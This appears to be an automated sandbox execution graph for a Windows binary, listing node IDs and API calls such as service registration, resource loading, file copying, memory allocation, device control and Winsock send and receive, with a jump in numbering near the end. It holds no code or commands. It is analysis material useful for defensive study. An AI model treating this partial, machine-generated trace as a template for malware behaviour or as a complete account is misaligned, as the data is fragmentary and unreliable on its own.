                                                              execution_graph 18281 40b902 RegCreateKeyExA 18282 2e1e864 18283 2e1e9e2 WriteFile 18282->18283 18284 40b846 lstrcmpiW 18285 40b176 StartServiceCtrlDispatcherA 18284->18285 18287 40b854 18284->18287 18288 40b1ee 18285->18288 18289 2dc79da 18290 2def353 ReadFile 18289->18290 18291 2df5a64 18290->18291 18292 40264c 18293 40b28f VirtualAlloc 18292->18293 18295 40b44f Sleep 18296 402151 18297 402156 18296->18297 18298 40b7e9 CopyFileA 18297->18298 18299 40b413 18302 401f64 FindResourceA 18299->18302 18301 40b418 18301->18301 18303 401f86 GetLastError SizeofResource 18302->18303 18309 401f9f 18302->18309 18304 401fa6 LoadResource LockResource GlobalAlloc 18303->18304 18303->18309 18305 401fd2 18304->18305 18306 401ffb GetTickCount 18305->18306 18308 402005 GlobalAlloc 18306->18308 18308->18309 18309->18301 18310 2d8104d 18315 2d932d4 18310->18315 18321 2d931d8 18315->18321 18317 2d81057 18318 2d81aa9 InterlockedIncrement 18317->18318 18319 2d8105c 18318->18319 18320 2d81ac5 WSAStartup InterlockedExchange 18318->18320 18320->18319 18322 2d931e4 __commit 18321->18322 18329 2d984c2 18322->18329 18328 2d9320b __commit 18328->18317 18346 2d9881d 18329->18346 18331 2d931ed 18332 2d9321c RtlDecodePointer RtlDecodePointer 18331->18332 18333 2d93249 18332->18333 18334 2d931f9 18332->18334 18333->18334 18645 2d9908d 18333->18645 18343 2d93216 18334->18343 18336 2d932ac RtlEncodePointer RtlEncodePointer 18336->18334 18337 2d9325b 18337->18336 18338 2d93280 18337->18338 18652 2d98a2b 18337->18652 18338->18334 18340 2d98a2b __realloc_crt 62 API calls 18338->18340 18342 2d9329a RtlEncodePointer 18338->18342 18341 2d93294 18340->18341 18341->18334 18341->18342 18342->18336 18679 2d984cb 18343->18679 18347 2d9882e 18346->18347 18348 2d98841 RtlEnterCriticalSection 18346->18348 18353 2d988a5 18347->18353 18348->18331 18350 2d98834 18350->18348 18375 2d9836f 18350->18375 18354 2d988b1 __commit 18353->18354 18355 2d988d0 
18354->18355 18382 2d98603 18354->18382 18363 2d988f3 __commit 18355->18363 18429 2d989e4 18355->18429 18361 2d988fd 18367 2d9881d __lock 59 API calls 18361->18367 18362 2d988ee 18434 2d95d8b 18362->18434 18363->18350 18364 2d988c6 18426 2d9824c 18364->18426 18368 2d98904 18367->18368 18369 2d98929 18368->18369 18370 2d98911 18368->18370 18440 2d92ea4 18369->18440 18437 2d9913c 18370->18437 18373 2d9891d 18446 2d98945 18373->18446 18376 2d98603 __FF_MSGBANNER 59 API calls 18375->18376 18377 2d98377 18376->18377 18378 2d98660 __NMSG_WRITE 59 API calls 18377->18378 18379 2d9837f 18378->18379 18615 2d9841e 18379->18615 18449 2da00be 18382->18449 18384 2d9860a 18386 2da00be __NMSG_WRITE 59 API calls 18384->18386 18388 2d98617 18384->18388 18385 2d98660 __NMSG_WRITE 59 API calls 18387 2d9862f 18385->18387 18386->18388 18390 2d98660 __NMSG_WRITE 59 API calls 18387->18390 18388->18385 18389 2d98639 18388->18389 18391 2d98660 18389->18391 18390->18389 18392 2d9867e __NMSG_WRITE 18391->18392 18394 2da00be __NMSG_WRITE 55 API calls 18392->18394 18425 2d987a5 18392->18425 18396 2d98691 18394->18396 18395 2d9880e 18395->18364 18397 2d987aa GetStdHandle 18396->18397 18398 2da00be __NMSG_WRITE 55 API calls 18396->18398 18401 2d987b8 _strlen 18397->18401 18397->18425 18399 2d986a2 18398->18399 18399->18397 18400 2d986b4 18399->18400 18400->18425 18471 2d9f46d 18400->18471 18403 2d987f1 WriteFile 18401->18403 18401->18425 18403->18425 18405 2d986e1 GetModuleFileNameW 18407 2d98701 18405->18407 18412 2d98711 __NMSG_WRITE 18405->18412 18406 2d98812 18408 2d94e35 __invoke_watson 8 API calls 18406->18408 18409 2d9f46d __NMSG_WRITE 55 API calls 18407->18409 18410 2d9881c 18408->18410 18409->18412 18411 2d98841 RtlEnterCriticalSection 18410->18411 18415 2d988a5 __mtinitlocknum 55 API calls 18410->18415 18411->18364 18412->18406 18413 2d98757 18412->18413 18480 2d9f4e2 18412->18480 18413->18406 18489 2d9f401 18413->18489 18417 2d98834 18415->18417 18417->18411 18419 2d9836f __amsg_exit 
55 API calls 18417->18419 18421 2d98840 18419->18421 18420 2d9f401 __NMSG_WRITE 55 API calls 18422 2d9878e 18420->18422 18421->18411 18422->18406 18423 2d98795 18422->18423 18498 2da00fe RtlEncodePointer 18423->18498 18523 2d9447b 18425->18523 18538 2d98218 GetModuleHandleExW 18426->18538 18431 2d989f2 18429->18431 18432 2d988e7 18431->18432 18541 2d92edc 18431->18541 18558 2d99435 Sleep 18431->18558 18432->18361 18432->18362 18561 2d95ba2 GetLastError 18434->18561 18436 2d95d90 18436->18363 18438 2d99159 InitializeCriticalSectionAndSpinCount 18437->18438 18439 2d9914c 18437->18439 18438->18373 18439->18373 18441 2d92ed6 _free 18440->18441 18442 2d92ead HeapFree 18440->18442 18441->18373 18442->18441 18443 2d92ec2 18442->18443 18444 2d95d8b __mbsnbcmp_l 57 API calls 18443->18444 18445 2d92ec8 GetLastError 18444->18445 18445->18441 18614 2d98987 RtlLeaveCriticalSection 18446->18614 18448 2d9894c 18448->18363 18450 2da00c8 18449->18450 18451 2da00d2 18450->18451 18452 2d95d8b __mbsnbcmp_l 59 API calls 18450->18452 18451->18384 18453 2da00ee 18452->18453 18456 2d94e25 18453->18456 18459 2d94dfa RtlDecodePointer 18456->18459 18460 2d94e0d 18459->18460 18465 2d94e35 IsProcessorFeaturePresent 18460->18465 18463 2d94dfa __mbsnbcmp_l 8 API calls 18464 2d94e31 18463->18464 18464->18384 18466 2d94e40 18465->18466 18467 2d94cc8 __call_reportfault 7 API calls 18466->18467 18468 2d94e55 18467->18468 18469 2d99443 ___raise_securityfailure GetCurrentProcess TerminateProcess 18468->18469 18470 2d94e24 18469->18470 18470->18463 18472 2d9f478 18471->18472 18473 2d9f486 18471->18473 18472->18473 18478 2d9f49f 18472->18478 18474 2d95d8b __mbsnbcmp_l 59 API calls 18473->18474 18475 2d9f490 18474->18475 18476 2d94e25 __mbsnbcmp_l 9 API calls 18475->18476 18477 2d986d4 18476->18477 18477->18405 18477->18406 18478->18477 18479 2d95d8b __mbsnbcmp_l 59 API calls 18478->18479 18479->18475 18485 2d9f4f0 18480->18485 18481 2d9f4f4 18482 2d95d8b __mbsnbcmp_l 59 API calls 18481->18482 18483 
2d9f4f9 18481->18483 18484 2d9f524 18482->18484 18483->18413 18486 2d94e25 __mbsnbcmp_l 9 API calls 18484->18486 18485->18481 18485->18483 18487 2d9f533 18485->18487 18486->18483 18487->18483 18488 2d95d8b __mbsnbcmp_l 59 API calls 18487->18488 18488->18484 18490 2d9f41b 18489->18490 18493 2d9f40d 18489->18493 18491 2d95d8b __mbsnbcmp_l 59 API calls 18490->18491 18492 2d9f425 18491->18492 18494 2d94e25 __mbsnbcmp_l 9 API calls 18492->18494 18493->18490 18496 2d9f447 18493->18496 18495 2d98777 18494->18495 18495->18406 18495->18420 18496->18495 18497 2d95d8b __mbsnbcmp_l 59 API calls 18496->18497 18497->18492 18499 2da0132 ___crtIsPackagedApp 18498->18499 18500 2da01f1 IsDebuggerPresent 18499->18500 18501 2da0141 LoadLibraryExW 18499->18501 18504 2da01fb 18500->18504 18505 2da0216 18500->18505 18502 2da0158 GetLastError 18501->18502 18503 2da017e GetProcAddress 18501->18503 18506 2da0167 LoadLibraryExW 18502->18506 18512 2da020e 18502->18512 18507 2da0192 7 API calls 18503->18507 18503->18512 18508 2da0202 OutputDebugStringW 18504->18508 18513 2da0209 18504->18513 18509 2da021b RtlDecodePointer 18505->18509 18505->18513 18506->18503 18506->18512 18510 2da01da GetProcAddress RtlEncodePointer 18507->18510 18511 2da01ee 18507->18511 18508->18513 18509->18512 18510->18511 18511->18500 18515 2d9447b __write_nolock 6 API calls 18512->18515 18513->18512 18514 2da0242 RtlDecodePointer RtlDecodePointer 18513->18514 18521 2da025a 18513->18521 18514->18521 18519 2da02e0 18515->18519 18516 2da0292 RtlDecodePointer 18517 2da027e RtlDecodePointer 18516->18517 18520 2da0299 18516->18520 18517->18512 18519->18425 18520->18517 18522 2da02aa RtlDecodePointer 18520->18522 18521->18516 18521->18517 18522->18517 18524 2d94483 18523->18524 18525 2d94485 IsProcessorFeaturePresent 18523->18525 18524->18395 18527 2d994bf 18525->18527 18530 2d9946e IsDebuggerPresent 18527->18530 18531 2d99483 __call_reportfault 18530->18531 18536 2d99458 SetUnhandledExceptionFilter UnhandledExceptionFilter 
18531->18536 18533 2d9948b __call_reportfault 18537 2d99443 GetCurrentProcess TerminateProcess 18533->18537 18535 2d994a8 18535->18395 18536->18533 18537->18535 18539 2d98243 ExitProcess 18538->18539 18540 2d98231 GetProcAddress 18538->18540 18540->18539 18542 2d92f57 18541->18542 18550 2d92ee8 18541->18550 18543 2d98133 _malloc RtlDecodePointer 18542->18543 18544 2d92f5d 18543->18544 18546 2d95d8b __mbsnbcmp_l 58 API calls 18544->18546 18545 2d98603 __FF_MSGBANNER 58 API calls 18555 2d92ef3 18545->18555 18557 2d92f4f 18546->18557 18547 2d92f1b RtlAllocateHeap 18547->18550 18547->18557 18548 2d98660 __NMSG_WRITE 58 API calls 18548->18555 18549 2d92f43 18552 2d95d8b __mbsnbcmp_l 58 API calls 18549->18552 18550->18547 18550->18549 18554 2d92f41 18550->18554 18550->18555 18559 2d98133 RtlDecodePointer 18550->18559 18552->18554 18553 2d9824c __mtinitlocknum 3 API calls 18553->18555 18556 2d95d8b __mbsnbcmp_l 58 API calls 18554->18556 18555->18545 18555->18548 18555->18550 18555->18553 18556->18557 18557->18431 18558->18431 18560 2d98146 18559->18560 18560->18550 18575 2d990fb 18561->18575 18563 2d95bb7 18564 2d95c05 SetLastError 18563->18564 18578 2d9899c 18563->18578 18564->18436 18568 2d95bde 18569 2d95bfc 18568->18569 18570 2d95be4 18568->18570 18572 2d92ea4 _free 56 API calls 18569->18572 18587 2d95c11 18570->18587 18574 2d95c02 18572->18574 18573 2d95bec GetCurrentThreadId 18573->18564 18574->18564 18576 2d9910e 18575->18576 18577 2d99112 TlsGetValue 18575->18577 18576->18563 18577->18563 18580 2d989a3 18578->18580 18581 2d95bca 18580->18581 18583 2d989c1 18580->18583 18597 2da03f8 18580->18597 18581->18564 18584 2d9911a 18581->18584 18583->18580 18583->18581 18605 2d99435 Sleep 18583->18605 18585 2d99130 18584->18585 18586 2d99134 TlsSetValue 18584->18586 18585->18568 18586->18568 18588 2d95c1d __commit 18587->18588 18589 2d9881d __lock 59 API calls 18588->18589 18590 2d95c5a 18589->18590 18606 2d95cb2 18590->18606 18593 2d9881d __lock 59 API calls 18594 2d95c7b 
___addlocaleref 18593->18594 18609 2d95cbb 18594->18609 18596 2d95ca6 __commit 18596->18573 18598 2da0403 18597->18598 18603 2da041e 18597->18603 18599 2da040f 18598->18599 18598->18603 18600 2d95d8b __mbsnbcmp_l 58 API calls 18599->18600 18602 2da0414 18600->18602 18601 2da042e RtlAllocateHeap 18601->18602 18601->18603 18602->18580 18603->18601 18603->18602 18604 2d98133 _malloc RtlDecodePointer 18603->18604 18604->18603 18605->18583 18612 2d98987 RtlLeaveCriticalSection 18606->18612 18608 2d95c74 18608->18593 18613 2d98987 RtlLeaveCriticalSection 18609->18613 18611 2d95cc2 18611->18596 18612->18608 18613->18611 18614->18448 18618 2d984d4 18615->18618 18617 2d9838a 18619 2d984e0 __commit 18618->18619 18620 2d9881d __lock 52 API calls 18619->18620 18621 2d984e7 18620->18621 18622 2d985a0 __cinit 18621->18622 18623 2d98515 RtlDecodePointer 18621->18623 18638 2d985ee 18622->18638 18623->18622 18625 2d9852c RtlDecodePointer 18623->18625 18631 2d9853c 18625->18631 18627 2d985fd __commit 18627->18617 18629 2d98549 RtlEncodePointer 18629->18631 18630 2d985e5 18632 2d9824c __mtinitlocknum 3 API calls 18630->18632 18631->18622 18631->18629 18633 2d98559 RtlDecodePointer RtlEncodePointer 18631->18633 18634 2d985ee 18632->18634 18636 2d9856b RtlDecodePointer RtlDecodePointer 18633->18636 18635 2d985fb 18634->18635 18643 2d98987 RtlLeaveCriticalSection 18634->18643 18635->18617 18636->18631 18639 2d985ce 18638->18639 18640 2d985f4 18638->18640 18639->18627 18642 2d98987 RtlLeaveCriticalSection 18639->18642 18644 2d98987 RtlLeaveCriticalSection 18640->18644 18642->18630 18643->18635 18644->18639 18646 2d990ab RtlSizeHeap 18645->18646 18647 2d99096 18645->18647 18646->18337 18648 2d95d8b __mbsnbcmp_l 59 API calls 18647->18648 18649 2d9909b 18648->18649 18650 2d94e25 __mbsnbcmp_l 9 API calls 18649->18650 18651 2d990a6 18650->18651 18651->18337 18655 2d98a32 18652->18655 18654 2d98a6f 18654->18338 18655->18654 18657 2da02e4 18655->18657 18678 2d99435 Sleep 18655->18678 18658 
2da02f8 18657->18658 18659 2da02ed 18657->18659 18660 2da0300 18658->18660 18670 2da030d 18658->18670 18661 2d92edc _malloc 59 API calls 18659->18661 18663 2d92ea4 _free 59 API calls 18660->18663 18662 2da02f5 18661->18662 18662->18655 18677 2da0308 _free 18663->18677 18664 2da0345 18666 2d98133 _malloc RtlDecodePointer 18664->18666 18665 2da0315 RtlReAllocateHeap 18665->18670 18665->18677 18667 2da034b 18666->18667 18668 2d95d8b __mbsnbcmp_l 59 API calls 18667->18668 18668->18677 18669 2da0375 18672 2d95d8b __mbsnbcmp_l 59 API calls 18669->18672 18670->18664 18670->18665 18670->18669 18671 2d98133 _malloc RtlDecodePointer 18670->18671 18674 2da035d 18670->18674 18671->18670 18673 2da037a GetLastError 18672->18673 18673->18677 18675 2d95d8b __mbsnbcmp_l 59 API calls 18674->18675 18676 2da0362 GetLastError 18675->18676 18676->18677 18677->18655 18678->18655 18682 2d98987 RtlLeaveCriticalSection 18679->18682 18681 2d9321b 18681->18328 18682->18681 18683 2dbfacc 18684 2dbfa59 18683->18684 18685 2dbfad0 18683->18685 18686 2dbfa8c CreateFileA 18684->18686 18686->18683 18687 2dbeb47 18688 2dbeb4c CreateFileA 18687->18688 18689 2dbeb59 18688->18689 18690 2dbf346 18693 2d8f7d5 CreateFileA 18690->18693 18694 2d8f8d1 18693->18694 18697 2d8f806 18693->18697 18695 2d8f81e DeviceIoControl 18695->18697 18696 2d8f8c7 CloseHandle 18696->18694 18697->18695 18697->18696 18698 2d8f893 GetLastError 18697->18698 18700 2d93a7c 18697->18700 18698->18696 18698->18697 18703 2d93a84 18700->18703 18701 2d92edc _malloc 59 API calls 18701->18703 18702 2d93a9e 18702->18697 18703->18701 18703->18702 18704 2d98133 _malloc RtlDecodePointer 18703->18704 18705 2d93aa2 std::exception::exception 18703->18705 18704->18703 18708 2d9448a 18705->18708 18707 2d93acc 18709 2d944a9 RaiseException 18708->18709 18709->18707 18711 40275d 18712 40ba95 Sleep 18711->18712 18713 2d86487 RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 18791 2d842c7 18713->18791 18792 
402d60 GetVersion 18816 4039f0 HeapCreate 18792->18816 18794 402dbf 18795 402dc4 18794->18795 18796 402dcc 18794->18796 18891 402e7b 18795->18891 18828 4036d0 18796->18828 18800 402dd4 GetCommandLineA 18842 40359e 18800->18842 18804 402dee 18874 403298 18804->18874 18806 402df3 18807 402df8 GetStartupInfoA 18806->18807 18887 403240 18807->18887 18809 402e0a GetModuleHandleA 18811 402e2e 18809->18811 18897 402fe7 18811->18897 18817 403a10 18816->18817 18818 403a46 18816->18818 18904 4038a8 18817->18904 18818->18794 18821 403a1f 18916 403dc7 HeapAlloc 18821->18916 18823 403a2c 18824 403a49 18823->18824 18918 404618 18823->18918 18824->18794 18825 403a29 18825->18824 18827 403a3a HeapDestroy 18825->18827 18827->18818 18981 402e9f 18828->18981 18831 4036ef GetStartupInfoA 18839 40373b 18831->18839 18840 403800 18831->18840 18834 403867 SetHandleCount 18834->18800 18835 403827 GetStdHandle 18838 403835 GetFileType 18835->18838 18835->18840 18836 4037ac 18836->18840 18841 4037ce GetFileType 18836->18841 18837 402e9f 12 API calls 18837->18839 18838->18840 18839->18836 18839->18837 18839->18840 18840->18834 18840->18835 18841->18836 18843 4035b9 GetEnvironmentStringsW 18842->18843 18844 4035ec 18842->18844 18845 4035c1 18843->18845 18847 4035cd GetEnvironmentStrings 18843->18847 18844->18845 18846 4035dd 18844->18846 18849 403605 WideCharToMultiByte 18845->18849 18850 4035f9 GetEnvironmentStringsW 18845->18850 18848 402de4 18846->18848 18851 40368b 18846->18851 18852 40367f GetEnvironmentStrings 18846->18852 18847->18846 18847->18848 18865 403351 18848->18865 18854 403639 18849->18854 18855 40366b FreeEnvironmentStringsW 18849->18855 18850->18848 18850->18849 18856 402e9f 12 API calls 18851->18856 18852->18848 18852->18851 18857 402e9f 12 API calls 18854->18857 18855->18848 18863 4036a6 18856->18863 18858 40363f 18857->18858 18858->18855 18859 403648 WideCharToMultiByte 18858->18859 18861 403662 18859->18861 18862 403659 18859->18862 18860 4036bc FreeEnvironmentStringsA 
18860->18848 18861->18855 19047 402f51 18862->19047 18863->18860 18866 403363 18865->18866 18867 403368 GetModuleFileNameA 18865->18867 19077 405042 18866->19077 18869 40338b 18867->18869 18870 402e9f 12 API calls 18869->18870 18871 4033ac 18870->18871 18872 402e56 7 API calls 18871->18872 18873 4033bc 18871->18873 18872->18873 18873->18804 18875 4032a5 18874->18875 18878 4032aa 18874->18878 18876 405042 19 API calls 18875->18876 18876->18878 18877 402e9f 12 API calls 18879 4032d7 18877->18879 18878->18877 18880 402e56 7 API calls 18879->18880 18886 4032eb 18879->18886 18880->18886 18881 40332e 18882 402f51 7 API calls 18881->18882 18883 40333a 18882->18883 18883->18806 18884 402e9f 12 API calls 18884->18886 18885 402e56 7 API calls 18885->18886 18886->18881 18886->18884 18886->18885 18888 403249 18887->18888 18890 40324e 18887->18890 18889 405042 19 API calls 18888->18889 18889->18890 18890->18809 18892 402e84 18891->18892 18893 402e89 18891->18893 18894 403c20 7 API calls 18892->18894 18895 403c59 7 API calls 18893->18895 18894->18893 18896 402e92 ExitProcess 18895->18896 19101 403009 18897->19101 18900 4030bc 18901 4030c8 18900->18901 18902 4031f1 UnhandledExceptionFilter 18901->18902 18903 402e48 18901->18903 18902->18903 18927 402c40 18904->18927 18907 4038d1 18908 4038eb GetEnvironmentVariableA 18907->18908 18910 4038e3 18907->18910 18909 4039c8 18908->18909 18912 40390a 18908->18912 18909->18910 18932 40387b GetModuleHandleA 18909->18932 18910->18821 18910->18823 18913 40394f GetModuleFileNameA 18912->18913 18914 403947 18912->18914 18913->18914 18914->18909 18929 40505e 18914->18929 18917 403de3 18916->18917 18917->18825 18919 404625 18918->18919 18920 40462c HeapAlloc 18918->18920 18921 404649 VirtualAlloc 18919->18921 18920->18921 18926 404681 18920->18926 18922 404669 VirtualAlloc 18921->18922 18923 40473e 18921->18923 18924 404730 VirtualFree 18922->18924 18922->18926 18925 404746 HeapFree 18923->18925 18923->18926 18924->18923 18925->18926 18926->18825 
18928 402c4c GetVersionExA 18927->18928 18928->18907 18928->18908 18934 405075 18929->18934 18933 403892 18932->18933 18933->18910 18936 40508d 18934->18936 18938 4050bd 18936->18938 18941 405d39 18936->18941 18937 405d39 6 API calls 18937->18938 18938->18937 18940 405071 18938->18940 18945 405c6d 18938->18945 18940->18909 18942 405d57 18941->18942 18943 405d4b 18941->18943 18951 405b24 18942->18951 18943->18936 18946 405c98 18945->18946 18950 405c7b 18945->18950 18947 405cb4 18946->18947 18948 405d39 6 API calls 18946->18948 18947->18950 18963 4058d5 18947->18963 18948->18947 18950->18938 18952 405b55 GetStringTypeW 18951->18952 18954 405b6d 18951->18954 18953 405b71 GetStringTypeA 18952->18953 18952->18954 18953->18954 18955 405c59 18953->18955 18957 405b98 GetStringTypeA 18954->18957 18958 405bbc 18954->18958 18955->18943 18957->18955 18958->18955 18959 405bd2 MultiByteToWideChar 18958->18959 18959->18955 18960 405bf6 18959->18960 18960->18955 18961 405c30 MultiByteToWideChar 18960->18961 18961->18955 18962 405c49 GetStringTypeW 18961->18962 18962->18955 18964 405905 LCMapStringW 18963->18964 18965 405921 18963->18965 18964->18965 18966 405929 LCMapStringA 18964->18966 18968 405987 18965->18968 18969 40596a LCMapStringA 18965->18969 18966->18965 18967 405a63 18966->18967 18967->18950 18968->18967 18970 40599d MultiByteToWideChar 18968->18970 18969->18967 18970->18967 18971 4059c7 18970->18971 18971->18967 18972 4059fd MultiByteToWideChar 18971->18972 18972->18967 18973 405a16 LCMapStringW 18972->18973 18973->18967 18974 405a31 18973->18974 18975 405a37 18974->18975 18977 405a77 18974->18977 18975->18967 18976 405a45 LCMapStringW 18975->18976 18976->18967 18977->18967 18978 405aaf LCMapStringW 18977->18978 18978->18967 18979 405ac7 WideCharToMultiByte 18978->18979 18979->18967 18990 402eb1 18981->18990 18984 402e56 18985 402e64 18984->18985 18986 402e5f 18984->18986 19033 403c59 18985->19033 19027 403c20 18986->19027 18991 402eae 18990->18991 18993 402eb8 
2d9b176 20538->20539 20542 2da0e84 __commit 59 API calls 20538->20542 20539->20536 20540 2da0e84 __commit 59 API calls 20539->20540 20543 2d9b182 CloseHandle 20540->20543 20545 2d9b16d 20542->20545 20543->20536 20546 2d9b18e GetLastError 20543->20546 20548 2da0e84 __commit 59 API calls 20545->20548 20546->20536 20548->20539 20561 2da0f6d RtlLeaveCriticalSection 20549->20561 20551 2d9b112 20551->20525 20553 2da0e6a 20552->20553 20554 2da0e0a 20552->20554 20555 2d95d8b __mbsnbcmp_l 59 API calls 20553->20555 20554->20553 20559 2da0e33 20554->20559 20556 2da0e6f 20555->20556 20558 2d9b1a0 20559->20558 20560 2da0e55 SetStdHandle 20559->20560 20560->20558 20561->20551 20563 2d927bb 20562->20563 20564 2d95d8b __mbsnbcmp_l 59 API calls 20563->20564 20567 2d927cb _strlen 20563->20567 20565 2d927c0 20564->20565 20566 2d94e25 __mbsnbcmp_l 9 API calls 20565->20566 20566->20567 20567->19943 20569 2d8df3c __EH_prolog 20568->20569 20570 2d93a7c _Allocate 60 API calls 20569->20570 20571 2d8df53 20570->20571 20571->19954 20573 2d90a69 20572->20573 20574 2d8513d 20572->20574 20575 2d932d4 __cinit 68 API calls 20573->20575 20574->19959 20575->20574 20577 2d90a40 Mailbox 68 API calls 20576->20577 20578 2d8a671 20577->20578 20579 2d8519d 20578->20579 20586 2d82db5 20578->20586 20579->19965 20579->19968 20579->19969 20582 2d90a40 Mailbox 68 API calls 20581->20582 20584 2d8ce25 20582->20584 20583 2d8cf34 20583->19965 20584->20583 20613 2d82b95 20584->20613 20587 2d82dca 20586->20587 20588 2d82de4 20586->20588 20589 2d90a40 Mailbox 68 API calls 20587->20589 20590 2d82dfc 20588->20590 20591 2d82def 20588->20591 20594 2d82dcf 20589->20594 20600 2d82d39 WSASetLastError WSASend 20590->20600 20593 2d90a40 Mailbox 68 API calls 20591->20593 20593->20594 20594->20578 20595 2d82e54 WSASetLastError select 20610 2d8a43b 20595->20610 20597 2d82e0c 20597->20594 20597->20595 20598 2d90a40 68 API calls Mailbox 20597->20598 20599 2d82d39 71 API calls 20597->20599 20598->20597 20599->20597 20601 2d8a43b 
69 API calls 20600->20601 20602 2d82d6e 20601->20602 20603 2d82d82 20602->20603 20604 2d82d75 20602->20604 20606 2d82d7a 20603->20606 20607 2d90a40 Mailbox 68 API calls 20603->20607 20605 2d90a40 Mailbox 68 API calls 20604->20605 20605->20606 20608 2d90a40 Mailbox 68 API calls 20606->20608 20609 2d82d9c 20606->20609 20607->20606 20608->20609 20609->20597 20611 2d90a40 Mailbox 68 API calls 20610->20611 20612 2d8a447 WSAGetLastError 20611->20612 20612->20597 20614 2d82bb1 20613->20614 20616 2d82bc7 20613->20616 20615 2d90a40 Mailbox 68 API calls 20614->20615 20621 2d82bb6 20615->20621 20617 2d82bd2 20616->20617 20627 2d82bdf 20616->20627 20620 2d90a40 Mailbox 68 API calls 20617->20620 20618 2d82be2 WSASetLastError WSARecv 20619 2d8a43b 69 API calls 20618->20619 20619->20627 20620->20621 20621->20584 20622 2d90a40 68 API calls Mailbox 20622->20627 20623 2d82d22 20628 2d81996 20623->20628 20625 2d82cbc WSASetLastError select 20626 2d8a43b 69 API calls 20625->20626 20626->20627 20627->20618 20627->20621 20627->20622 20627->20623 20627->20625 20629 2d819bb 20628->20629 20630 2d8199f 20628->20630 20629->20621 20631 2d932d4 __cinit 68 API calls 20630->20631 20631->20629 20654 2d8e1b2 20632->20654 20634 2d8d032 20634->19987 20736 2d932e9 20635->20736 20638 2d92044 20638->19989 20639 2d9206d ResumeThread 20639->19989 20640 2d92066 CloseHandle 20640->20639 20642 2d90a40 Mailbox 68 API calls 20641->20642 20643 2d83fb8 20642->20643 20798 2d81815 20643->20798 20646 2d8a5bd 20647 2d8a5c7 __EH_prolog 20646->20647 20804 2d8cb75 20647->20804 20655 2d8e1bc __EH_prolog 20654->20655 20660 2d84030 20655->20660 20659 2d8e1ea 20659->20634 20672 2da5330 20660->20672 20662 2d8403a GetProcessHeap RtlAllocateHeap 20663 2d8407c 20662->20663 20664 2d84053 std::exception::exception 20662->20664 20663->20659 20666 2d8408a 20663->20666 20673 2d8a5fc 20664->20673 20667 2d84094 __EH_prolog 20666->20667 20717 2d8a21b 20667->20717 20672->20662 20674 2d8a606 __EH_prolog 20673->20674 20681 2d8cbab 
20674->20681 20679 2d9448a __CxxThrowException@8 RaiseException 20680 2d8a634 20679->20680 20687 2d8d70b 20681->20687 20684 2d8cbc5 20709 2d8d743 20684->20709 20686 2d8a623 20686->20679 20690 2d92443 20687->20690 20693 2d92471 20690->20693 20694 2d8a615 20693->20694 20695 2d9247f 20693->20695 20694->20684 20699 2d92507 20695->20699 20700 2d92484 20699->20700 20701 2d92510 20699->20701 20700->20694 20703 2d924c9 20700->20703 20702 2d92ea4 _free 59 API calls 20701->20702 20702->20700 20704 2d924fa 20703->20704 20705 2d924d5 _strlen 20703->20705 20704->20694 20706 2d92edc _malloc 59 API calls 20705->20706 20707 2d924e7 20706->20707 20707->20704 20708 2d96bec std::exception::_Copy_str 59 API calls 20707->20708 20708->20704 20710 2d8d74d __EH_prolog 20709->20710 20713 2d8b66e 20710->20713 20712 2d8d784 Mailbox 20712->20686 20714 2d8b678 __EH_prolog 20713->20714 20715 2d92443 std::exception::exception 59 API calls 20714->20715 20716 2d8b689 Mailbox 20715->20716 20716->20712 20728 2d8b032 20717->20728 20719 2d840c1 20720 2d83fdc 20719->20720 20735 2da5330 20720->20735 20722 2d83fe6 CreateEventA 20723 2d83ffd 20722->20723 20724 2d8400f 20722->20724 20725 2d83fb0 Mailbox 68 API calls 20723->20725 20724->20659 20726 2d84005 20725->20726 20727 2d8a5bd Mailbox 60 API calls 20726->20727 20727->20724 20729 2d8b05a 20728->20729 20730 2d8b03e 20728->20730 20729->20719 20731 2d93a7c _Allocate 60 API calls 20730->20731 20732 2d8b04e std::exception::exception 20730->20732 20731->20732 20732->20729 20733 2d9448a __CxxThrowException@8 RaiseException 20732->20733 20734 2d8fa63 20733->20734 20735->20722 20737 2d9330b 20736->20737 20738 2d932f7 20736->20738 20740 2d9899c __calloc_crt 59 API calls 20737->20740 20739 2d95d8b __mbsnbcmp_l 59 API calls 20738->20739 20741 2d932fc 20739->20741 20742 2d93318 20740->20742 20743 2d94e25 __mbsnbcmp_l 9 API calls 20741->20743 20744 2d93369 20742->20744 20747 2d95b8a __write_nolock 59 API calls 20742->20747 20746 2d9203b 20743->20746 20745 2d92ea4 
_free 59 API calls 20744->20745 20748 2d9336f 20745->20748 20746->20638 20746->20639 20746->20640 20749 2d93325 20747->20749 20748->20746 20752 2d95d6a __dosmaperr 59 API calls 20748->20752 20750 2d95c11 __initptd 59 API calls 20749->20750 20751 2d9332e CreateThread 20750->20751 20751->20746 20754 2d93361 GetLastError 20751->20754 20755 2d93449 20751->20755 20752->20746 20754->20744 20756 2d93452 __threadstartex@4 20755->20756 20757 2d990fb __CRT_INIT@12 TlsGetValue 20756->20757 20758 2d93458 20757->20758 20759 2d9348b 20758->20759 20760 2d9345f __threadstartex@4 20758->20760 20761 2d95a1f __freefls@4 59 API calls 20759->20761 20762 2d9911a __CRT_INIT@12 TlsSetValue 20760->20762 20765 2d934a6 ___crtIsPackagedApp 20761->20765 20763 2d9346e 20762->20763 20766 2d93481 GetCurrentThreadId 20763->20766 20767 2d93474 GetLastError RtlExitUserThread 20763->20767 20764 2d934ba 20777 2d93382 20764->20777 20765->20764 20771 2d933f1 20765->20771 20766->20765 20767->20766 20772 2d933fa LoadLibraryExW GetProcAddress 20771->20772 20773 2d93433 RtlDecodePointer 20771->20773 20774 2d9341d RtlEncodePointer 20772->20774 20775 2d9341c 20772->20775 20776 2d93443 20773->20776 20774->20773 20775->20764 20776->20764 20778 2d9338e __commit 20777->20778 20779 2d95b8a __write_nolock 59 API calls 20778->20779 20780 2d93393 20779->20780 20785 2d933c3 20780->20785 20786 2d95ba2 __getptd_noexit 59 API calls 20785->20786 20787 2d933cc 20786->20787 20788 2d933e7 RtlExitUserThread 20787->20788 20789 2d933e0 20787->20789 20793 2d934c6 20787->20793 20791 2d95b54 __freeptd 59 API calls 20789->20791 20792 2d933e6 20791->20792 20792->20788 20794 2d934cf LoadLibraryExW GetProcAddress 20793->20794 20795 2d93507 RtlDecodePointer 20793->20795 20796 2d934f1 RtlEncodePointer 20794->20796 20797 2d93515 20794->20797 20795->20797 20796->20795 20797->20789 20801 2d92403 20798->20801 20802 2d924c9 std::exception::_Copy_str 59 API calls 20801->20802 20803 2d8182a 20802->20803 20803->20646 20810 2d8d63c 20804->20810 
